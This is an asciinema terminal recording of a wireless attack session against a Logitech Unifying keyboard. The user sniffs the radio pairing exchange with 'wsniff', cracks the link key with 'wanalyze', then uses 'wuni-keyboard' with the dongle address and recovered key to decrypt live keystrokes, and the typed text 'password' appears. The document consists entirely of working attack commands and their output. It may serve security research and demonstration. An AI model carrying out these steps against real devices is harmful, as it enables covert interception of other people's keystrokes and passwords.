{"version": 2, "width": 191, "height": 56, "timestamp": 1723427653, "env": {"SHELL": "/usr/bin/zsh", "TERM": "xterm-256color"}}
[0.332199, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[0m                                                                                                                                                                                              \r \r\u001b]2;virtualabs@virtubox:~\u0007\u001b]1;~\u0007"]
[0.344885, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[39m\u001b[0m\u001b[49m\u001b[40m\u001b[39m virtualabs@virtubox \u001b[44m\u001b[30m\u001b[30m ~ \u001b[49m\u001b[34m\u001b[39m \u001b[K"]
[0.345015, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[1.017649, "o", "w"]
[1.215843, "o", "\bws"]
[1.370654, "o", "n"]
[1.546844, "o", "i"]
[1.62356, "o", "f"]
[1.73826, "o", "f"]
[1.881317, "o", " "]
[1.993078, "o", "0"]
[1.993554, "o", "-"]
[2.572385, "o", "\b \b"]
[2.691647, "o", "\b \b"]
[3.292102, "o", "-"]
[3.581005, "o", "i"]
[3.741335, "o", " "]
[3.953865, "o", "u"]
[4.03034, "o", "a"]
[4.159114, "o", "r"]
[4.32555, "o", "t"]
[4.450464, "o", "0"]
[4.815063, "o", " "]
[5.465532, "o", "-"]
[7.159149, "o", "o"]
[7.328906, "o", " "]
[7.492669, "o", "p"]
[7.613274, "o", "a"]
[7.763365, "o", "i"]
[7.891648, "o", "r"]
[7.98367, "o", "i"]
[8.149119, "o", "n"]
[8.241824, "o", "g"]
[8.540197, "o", "-"]
[10.49747, "o", "k"]
[10.779804, "o", "b"]
[10.870862, "o", "d"]
[11.316663, "o", "."]
[11.583007, "o", "p"]
[11.652521, "o", "c"]
[11.787822, "o", "a"]
[11.873887, "o", "p"]
[12.140892, "o", " "]
[12.545057, "o", "u"]
[12.824165, "o", "n"]
[13.06539, "o", "i"]
[13.290925, "o", "f"]
[13.440894, "o", "y"]
[13.640279, "o", "i"]
[13.826788, "o", "n"]
[13.977352, "o", "g"]
[14.21326, "o", " "]
[16.175321, "o", "-"]
[16.580068, "o", "p"]
[17.04265, "o", "\u001b[?1l\u001b>"]
[17.043198, "o", "\u001b[?2004l\r\r\n"]
[17.045109, "o", "\u001b]2;wsniff -i uart0 -o pairing-kbd.pcap unifying -p\u0007\u001b]1;wsniff\u0007"]
[22.860479, "o", "\u001b[0m\u001b[?7h\u001b[0;1m[ raw=True, decrypted=False, timestamp=29778820, channel=44, rssi=-50, is_crc_valid=True, address=bb:0a:dc:a5:75 ]\u001b[0m\r\r\n\u001b[0m"]
[22.860853, "o", "\u001b[0m<\u001b[0m\u001b[31m\u001b[1mESB_Hdr\u001b[0m  \u001b[33m\u001b[1mpreamble\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0xaa\u001b[0m \u001b[33m\u001b[1maddress_length\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m5\u001b[0m \u001b[33m\u001b[1maddress\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1mbb:0a:dc:a5:75\u001b[0m \u001b[33m\u001b[1mpayload_length\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m22\u001b[0m \u001b[33m\u001b[1mpid\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0\u001b[0m \u001b[33m\u001b[1mno_ack\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0\u001b[0m \u001b[33m\u001b[1mpadding\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0\u001b[0m \u001b[33m\u001b[1mvalid_crc\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1myes\u001b[0m \u001b[33m\u001b[1mcrc\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0x7a94\u001b[0m \u001b[0m|\u001b[0m\u001b[0m<\u001b[0m\u001b[31m\u001b[1mESB_Payload_Hdr\u001b[0m  \u001b[0m|\u001b[0m\u001b[0m<\u001b[0m\u001b[31m\u001b[1mLogitech_Unifying_Hdr\u001b[0m  \u001b[33m\u001b[1mdev_index\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0xfc\u001b[0m \u001b[33m\u001b[1mframe_type\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0x5f\u001b[0m \u001b[33m\u001b[1mchecksum\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0xc2\u001b[0m \u001b[0m|\u001b[0m\u001b[0m<\u001b[0m\u001b[31m\u001b[1mLogitech_Pairing_Request_Header\u001b[0m  \u001b[33m\u001b[1mpairing_phase\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1mfirst_phase\u001b[0m \u001b[0m|\u001b[0m\u001b[0m<\u001b[0m\u001b[31m\u001b[1mLogitech_Pairing_Request_1_Payload\u001b[0m  \u001b[33m\u001b[1mrf_address\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m59:11:98:29:d4\u001b[0m \u001b[33m\u001b[1munknown1\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m8\u001b[0m \u001b[33m\u001b[1mdevice_wpid\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m16461\u001b[0m \u001b[33m\u001b[1mprotocol_id\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1munifying\u001b[0m \u001b[33m\u001b[1munknown2\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m2\u001b[0m \u001b[33m\u001b[1mdevice_type\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1mkeyboard\u001b[0m \u001b[33m\u001b[1munknown3\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0\u001b[0m \u001b[33m\u001b[1mpadding\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m''\u001b[0m \u001b[0m|\u001b[0m\u001b[0m>\u001b[0m\u001b[0m>\u001b[0m\u001b[0m>\u001b[0m\u001b[0m>\u001b[0m\u001b[0m>\u001b[0m\r\n\r\n"]
[22.864132, "o", "\u001b[0m\u001b[?7h\u001b[0;1m[ raw=True, decrypted=False, timestamp=29790030, channel=44, rssi=-50, is_crc_valid=True, address=bb:0a:dc:a5:75 ]\u001b[0m\r\r\n\u001b[0m"]
[22.864373, "o", "\u001b[0m<\u001b[0m\u001b[31m\u001b[1mESB_Hdr\u001b[0m  \u001b[33m\u001b[1mpreamble\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0xaa\u001b[0m \u001b[33m\u001b[1maddress_length\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m5\u001b[0m \u001b[33m\u001b[1maddress\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1mbb:0a:dc:a5:75\u001b[0m \u001b[33m\u001b[1mpayload_length\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m5\u001b[0m \u001b[33m\u001b[1mpid\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m1\u001b[0m \u001b[33m\u001b[1mno_ack\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0\u001b[0m \u001b[33m\u001b[1mpadding\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0\u001b[0m \u001b[33m\u001b[1mvalid_crc\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1myes\u001b[0m \u001b[33m\u001b[1mcrc\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0x85b7\u001b[0m \u001b[0m|\u001b[0m\u001b[0m<\u001b[0m\u001b[31m\u001b[1mESB_Payload_Hdr\u001b[0m  \u001b[0m|\u001b[0m\u001b[0m<\u001b[0m\u001b[31m\u001b[1mLogitech_Unifying_Hdr\u001b[0m  \u001b[33m\u001b[1mdev_index\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0xfc\u001b[0m \u001b[33m\u001b[1mframe_type\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0x40\u001b[0m \u001b[33m\u001b[1mchecksum\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0x6a\u001b[0m \u001b[0m|\u001b[0m\u001b[0m<\u001b[0m\u001b[31m\u001b[1mLogitech_Keepalive_Payload\u001b[0m  \u001b[33m\u001b[1mtimeout\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m345\u001b[0m \u001b[0m|\u001b[0m\u001b[0m>\u001b[0m\u001b[0m>\u001b[0m\u001b[0m>\u001b[0m\u001b[0m>\u001b[0m\r\n\r\n"]
[22.872246, "o", "\u001b[0m\u001b[?7h\u001b[0;1m[ raw=True, decrypted=False, timestamp=29790223, channel=44, rssi=-53, is_crc_valid=True, address=bb:0a:dc:a5:75 ]\u001b[0m\r\r\n\u001b[0m"]
[22.872578, "o", "\u001b[0m<\u001b[0m\u001b[31m\u001b[1mESB_Hdr\u001b[0m  \u001b[33m\u001b[1mpreamble\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0xaa\u001b[0m \u001b[33m\u001b[1maddress_length\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m5\u001b[0m \u001b[33m\u001b[1maddress\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1mbb:0a:dc:a5:75\u001b[0m \u001b[33m\u001b[1mpayload_length\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m22\u001b[0m \u001b[33m\u001b[1mpid\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m1\u001b[0m \u001b[33m\u001b[1mno_ack\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0\u001b[0m \u001b[33m\u001b[1mpadding\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0\u001b[0m \u001b[33m\u001b[1mvalid_crc\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1myes\u001b[0m \u001b[33m\u001b[1mcrc\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0xd7c4\u001b[0m \u001b[0m|\u001b[0m\u001b[0m<\u001b[0m\u001b[31m\u001b[1mESB_Payload_Hdr\u001b[0m  \u001b[0m|\u001b[0m\u001b[0m<\u001b[0m\u001b[31m\u001b[1mLogitech_Unifying_Hdr\u001b[0m  \u001b[33m\u001b[1mdev_index\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0xfc\u001b[0m \u001b[33m\u001b[1mframe_type\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0x1f\u001b[0m \u001b[33m\u001b[1mchecksum\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0xe8\u001b[0m \u001b[0m|\u001b[0m\u001b[0m<\u001b[0m\u001b[31m\u001b[1mLogitech_Pairing_Response_Header\u001b[0m  \u001b[33m\u001b[1mpairing_phase\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1mfirst_phase\u001b[0m \u001b[0m|\u001b[0m\u001b[0m<\u001b[0m\u001b[31m\u001b[1mLogitech_Pairing_Response_1_Payload\u001b[0m  \u001b[33m\u001b[1mrf_address\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1ma8:41:9e:b5:21\u001b[0m \u001b[33m\u001b[1munknown1\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m8\u001b[0m \u001b[33m\u001b[1mdongle_wpid\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m34818\u001b[0m \u001b[33m\u001b[1mprotocol_id\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1munifying\u001b[0m \u001b[33m\u001b[1munknown2\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m1\u001b[0m \u001b[33m\u001b[1munknown3\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m1\u001b[0m \u001b[33m\u001b[1munknown4\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m7\u001b[0m \u001b[33m\u001b[1mpadding\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m''\u001b[0m \u001b[0m|\u001b[0m\u001b[0m>\u001b[0m\u001b[0m>\u001b[0m\u001b[0m>\u001b[0m\u001b[0m>\u001b[0m\u001b[0m>\u001b[0m\r\n\r\n"]
[22.881715, "o", "\u001b[0m\u001b[?7h\u001b[0;1m[ raw=True, decrypted=False, timestamp=29808808, channel=44, rssi=-50, is_crc_valid=True, address=a8:41:9e:b5:21 ]\u001b[0m\r\r\n\u001b[0m"]
[22.882047, "o", "\u001b[0m<\u001b[0m\u001b[31m\u001b[1mESB_Hdr\u001b[0m  \u001b[33m\u001b[1mpreamble\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0xaa\u001b[0m \u001b[33m\u001b[1maddress_length\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m5\u001b[0m \u001b[33m\u001b[1maddress\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1ma8:41:9e:b5:21\u001b[0m \u001b[33m\u001b[1mpayload_length\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m22\u001b[0m \u001b[33m\u001b[1mpid\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m3\u001b[0m \u001b[33m\u001b[1mno_ack\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0\u001b[0m \u001b[33m\u001b[1mpadding\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0\u001b[0m \u001b[33m\u001b[1mvalid_crc\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1myes\u001b[0m \u001b[33m\u001b[1mcrc\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0xe837\u001b[0m \u001b[0m|\u001b[0m\u001b[0m<\u001b[0m\u001b[31m\u001b[1mESB_Payload_Hdr\u001b[0m  \u001b[0m|\u001b[0m\u001b[0m<\u001b[0m\u001b[31m\u001b[1mLogitech_Unifying_Hdr\u001b[0m  \u001b[33m\u001b[1mdev_index\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0xfc\u001b[0m \u001b[33m\u001b[1mframe_type\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0x5f\u001b[0m \u001b[33m\u001b[1mchecksum\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0x6d\u001b[0m \u001b[0m|\u001b[0m\u001b[0m<\u001b[0m\u001b[31m\u001b[1mLogitech_Pairing_Request_Header\u001b[0m  \u001b[33m\u001b[1mpairing_phase\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1msecond_phase\u001b[0m \u001b[0m|\u001b[0m\u001b[0m<\u001b[0m\u001b[31m\u001b[1mLogitech_Pairing_Request_2_Payload\u001b[0m  \u001b[33m\u001b[1mdevice_nonce\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m'\\\\x9cK%\\\\xd3'\u001b[0m \u001b[33m\u001b[1mdevice_serial\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m'<\\\\x89\\\\xfb0'\u001b[0m \u001b[33m\u001b[1mcapabilities\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1mkeyboard\u001b[0m \u001b[33m\u001b[1munknown\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m'\\x00\\x00\\t'\u001b[0m \u001b[0m|\u001b[0m\u001b[0m>\u001b[0m\u001b[0m>\u001b[0m\u001b[0m>\u001b[0m\u001b[0m>\u001b[0m\u001b[0m>\u001b[0m\r\n\r\n"]
[22.889458, "o", "\u001b[0m\u001b[?7h\u001b[0;1m[ raw=True, decrypted=False, timestamp=29821101, channel=44, rssi=-50, is_crc_valid=True, address=a8:41:9e:b5:21 ]\u001b[0m\r\r\n\u001b[0m"]
[22.889705, "o", "\u001b[0m<\u001b[0m\u001b[31m\u001b[1mESB_Hdr\u001b[0m  \u001b[33m\u001b[1mpreamble\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0xaa\u001b[0m \u001b[33m\u001b[1maddress_length\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m5\u001b[0m \u001b[33m\u001b[1maddress\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1ma8:41:9e:b5:21\u001b[0m \u001b[33m\u001b[1mpayload_length\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m5\u001b[0m \u001b[33m\u001b[1mpid\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0\u001b[0m \u001b[33m\u001b[1mno_ack\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0\u001b[0m \u001b[33m\u001b[1mpadding\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0\u001b[0m \u001b[33m\u001b[1mvalid_crc\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1myes\u001b[0m \u001b[33m\u001b[1mcrc\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0x614a\u001b[0m \u001b[0m|\u001b[0m\u001b[0m<\u001b[0m\u001b[31m\u001b[1mESB_Payload_Hdr\u001b[0m  \u001b[0m|\u001b[0m\u001b[0m<\u001b[0m\u001b[31m\u001b[1mLogitech_Unifying_Hdr\u001b[0m  \u001b[33m\u001b[1mdev_index\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0xfc\u001b[0m \u001b[33m\u001b[1mframe_type\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0x40\u001b[0m \u001b[33m\u001b[1mchecksum\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0x26\u001b[0m \u001b[0m|\u001b[0m\u001b[0m<\u001b[0m\u001b[31m\u001b[1mLogitech_Keepalive_Payload\u001b[0m  \u001b[33m\u001b[1mtimeout\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m668\u001b[0m \u001b[0m|\u001b[0m\u001b[0m>\u001b[0m\u001b[0m>\u001b[0m\u001b[0m>\u001b[0m\u001b[0m>\u001b[0m\r\n\r\n"]
[22.908259, "o", "\u001b[0m\u001b[?7h\u001b[0;1m[ raw=True, decrypted=False, timestamp=29821293, channel=44, rssi=-53, is_crc_valid=True, address=a8:41:9e:b5:21 ]\u001b[0m\r\r\n\u001b[0m"]
[22.908498, "o", "\u001b[0m<\u001b[0m\u001b[31m\u001b[1mESB_Hdr\u001b[0m  \u001b[33m\u001b[1mpreamble\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0xaa\u001b[0m \u001b[33m\u001b[1maddress_length\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m5\u001b[0m \u001b[33m\u001b[1maddress\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1ma8:41:9e:b5:21\u001b[0m \u001b[33m\u001b[1mpayload_length\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m22\u001b[0m \u001b[33m\u001b[1mpid\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0\u001b[0m \u001b[33m\u001b[1mno_ack\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0\u001b[0m \u001b[33m\u001b[1mpadding\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0\u001b[0m \u001b[33m\u001b[1mvalid_crc\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1myes\u001b[0m \u001b[33m\u001b[1mcrc\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0x5f53\u001b[0m \u001b[0m|\u001b[0m\u001b[0m<\u001b[0m\u001b[31m\u001b[1mESB_Payload_Hdr\u001b[0m  \u001b[0m|\u001b[0m\u001b[0m<\u001b[0m\u001b[31m\u001b[1mLogitech_Unifying_Hdr\u001b[0m  \u001b[33m\u001b[1mdev_index\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0xfc\u001b[0m \u001b[33m\u001b[1mframe_type\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0x1f\u001b[0m \u001b[33m\u001b[1mchecksum\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m0xe4\u001b[0m \u001b[0m|\u001b[0m\u001b[0m<\u001b[0m\u001b[31m\u001b[1mLogitech_Pairing_Response_Header\u001b[0m  \u001b[33m\u001b[1mpairing_phase\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1msecond_phase\u001b[0m \u001b[0m|\u001b[0m\u001b[0m<\u001b[0m\u001b[31m\u001b[1mLogitech_Pairing_Response_2_Payload\u001b[0m  \u001b[33m\u001b[1mdongle_nonce\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m'v\\\\xa4Z4'\u001b[0m \u001b[33m\u001b[1mdongle_serial\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m'<\\\\x89\\\\xfb0'\u001b[0m \u001b[33m\u001b[1mcapabilities\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1mkeyboard\u001b[0m \u001b[33m\u001b[1munknown\u001b[0m\u001b[0m=\u001b[0m\u001b[35m\u001b[1m'\\x00\\x00\\t'\u001b[0m \u001b[0m|\u001b[0m\u001b[0m>\u001b[0m\u001b[0m>\u001b[0m\u001b[0m>\u001b[0m\u001b[0m>\u001b[0m\u001b[0m>\u001b[0m\r\n\r\n"]
[25.981706, "o", "^C"]
[25.98718, "o", "\u001b[0m\u001b[?7h\u001b[0;38;5;172m/!\\ \u001b[0;38;5;172;1msniffer stopped (CTRL-C)\u001b[0m\r\r\n\u001b[0m"]
[27.264657, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[0m                                                                                                                                                                                              \r \r"]
[27.264827, "o", "\u001b]2;virtualabs@virtubox:~\u0007\u001b]1;~\u0007"]
[27.281176, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[39m\u001b[0m\u001b[49m\u001b[40m\u001b[39m virtualabs@virtubox \u001b[44m\u001b[30m\u001b[30m ~ \u001b[49m\u001b[34m\u001b[39m \u001b[K"]
[27.281361, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[28.080832, "o", "w"]
[28.350934, "o", "\bwp"]
[28.507816, "o", "l"]
[28.64407, "o", "a"]
[28.788853, "o", "y"]
[29.03552, "o", " "]
[29.402487, "o", "-"]
[29.512522, "o", "-"]
[29.8784, "o", "f"]
[30.092765, "o", "l"]
[30.327947, "o", "u"]
[30.469883, "o", "s"]
[30.56264, "o", "h"]
[30.759265, "o", " "]
[30.9554, "o", "p"]
[31.108895, "o", "a"]
[31.221649, "o", "i"]
[31.391246, "o", "r"]
[31.540289, "o", "i"]
[31.760627, "o", "ng"]
[33.031018, "o", "-"]
[33.255235, "o", "kbd.pcap\u001b[1m \u001b[0m"]
[35.701266, "o", "\b\u001b[0m|"]
[36.333976, "o", "w"]
[36.551195, "o", "a"]
[37.725484, "o", "n"]
[37.856786, "o", "a"]
[38.038044, "o", "l"]
[38.337671, "o", "y"]
[38.437089, "o", "z"]
[38.704011, "o", "e"]
[39.292953, "o", "\u001b[?1l\u001b>"]
[39.293174, "o", "\u001b[?2004l\r\r\n"]
[39.295152, "o", "\u001b]2;wplay --flush pairing-kbd.pcap | wanalyze\u0007\u001b]1;wplay\u0007"]
[40.165491, "o", "\u001b[0m\u001b[?7h\u001b[0;38;5;28;1m[✓] pairing_cracking → completed\u001b[0m\r\r\n\u001b[0m"]
[40.167492, "o", "\u001b[0m\u001b[?7h\u001b[0m  - \u001b[0;1mkey: \u001b[0m 02bea8b525611e5a9c88894da46140d3\r\r\n\u001b[0m"]
[40.167607, "o", "\r\n"]
[41.612196, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[0m                                                                                                                                                                                              \r \r"]
[41.612376, "o", "\u001b]2;virtualabs@virtubox:~\u0007\u001b]1;~\u0007"]
[41.63169, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[39m\u001b[0m\u001b[49m\u001b[40m\u001b[39m virtualabs@virtubox \u001b[44m\u001b[30m\u001b[30m ~ \u001b[49m\u001b[34m\u001b[39m \u001b[K"]
[41.631885, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[42.93781, "o", "w"]
[43.159239, "o", "\bwu"]
[43.391298, "o", "n"]
[43.643983, "o", "i"]
[45.342663, "o", "-"]
[46.198219, "o", "k"]
[46.384988, "o", "e"]
[46.509237, "o", "y"]
[46.71178, "o", "b"]
[46.901304, "o", "o"]
[46.953007, "o", "a"]
[47.078961, "o", "r"]
[47.214425, "o", "d"]
[47.705326, "o", " "]
[47.999197, "o", "-"]
[48.773516, "o", "i"]
[48.889501, "o", " "]
[49.078601, "o", "u"]
[49.178721, "o", "a"]
[49.311019, "o", "r"]
[49.481173, "o", "t"]
[49.592611, "o", "0"]
[49.979645, "o", " "]
[50.406615, "o", "-"]
[50.526992, "o", "a"]
[50.681963, "o", " "]
[55.417601, "o", "\u001b[7ma8:41:9e:b5:21\u001b[27m"]
[55.948985, "o", "\u001b[14D\u001b[27ma\u001b[27m8\u001b[27m:\u001b[27m4\u001b[27m1\u001b[27m:\u001b[27m9\u001b[27me\u001b[27m:\u001b[27mb\u001b[27m5\u001b[27m:\u001b[27m2\u001b[27m1"]
[56.393711, "o", " "]
[56.918931, "o", "-"]
[57.150752, "o", "k"]
[57.31833, "o", " "]
[59.906759, "o", "\u001b[7m02bea8b525611e5a9c88894da46140d3\u001b[27m"]
[60.305674, "o", "\u001b[32D\u001b[27m0\u001b[27m2\u001b[27mb\u001b[27me\u001b[27ma\u001b[27m8\u001b[27mb\u001b[27m5\u001b[27m2\u001b[27m5\u001b[27m6\u001b[27m1\u001b[27m1\u001b[27me\u001b[27m5\u001b[27ma\u001b[27m9\u001b[27mc\u001b[27m8\u001b[27m8\u001b[27m8\u001b[27m9\u001b[27m4\u001b[27md\u001b[27ma\u001b[27m4\u001b[27m6\u001b[27m1\u001b[27m4\u001b[27m0\u001b[27md\u001b[27m3 "]
[61.40631, "o", "-"]
[61.709215, "o", "l"]
[61.895922, "o", " "]
[62.509379, "o", "f"]
[62.778735, "o", "r"]
[64.243889, "o", "\u001b[?1l\u001b>"]
[64.244133, "o", "\u001b[?2004l\r\r\n"]
[64.24601, "o", "\u001b]2;wuni-keyboard -i uart0 -a a8:41:9e:b5:21 -k 02bea8b525611e5a9c88894da46140d3 \u0007\u001b]1;wuni-keyboard\u0007"]
[67.005318, "o", "p\r\n"]
[68.175298, "o", "pa\r\n"]
[69.503712, "o", "pas\r\n"]
[70.356408, "o", "pass\r\n"]
[71.513349, "o", "passw\r\n"]
[72.73265, "o", "passwo\r\n"]
[74.040717, "o", "passwor\r\n"]
[75.412903, "o", "password\r\n"]
[77.865903, "o", "^C"]
[79.152277, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[0m                                                                                                                                                                                              \r \r"]
[79.152363, "o", "\u001b]2;virtualabs@virtubox:~\u0007\u001b]1;~\u0007"]
[79.170151, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[39m\u001b[0m\u001b[49m\u001b[40m\u001b[39m virtualabs@virtubox \u001b[44m\u001b[30m\u001b[30m ~ \u001b[49m\u001b[34m\u001b[39m \u001b[K"]
[79.170317, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[79.905024, "o", "\u001b[?2004l\r\r\n"]
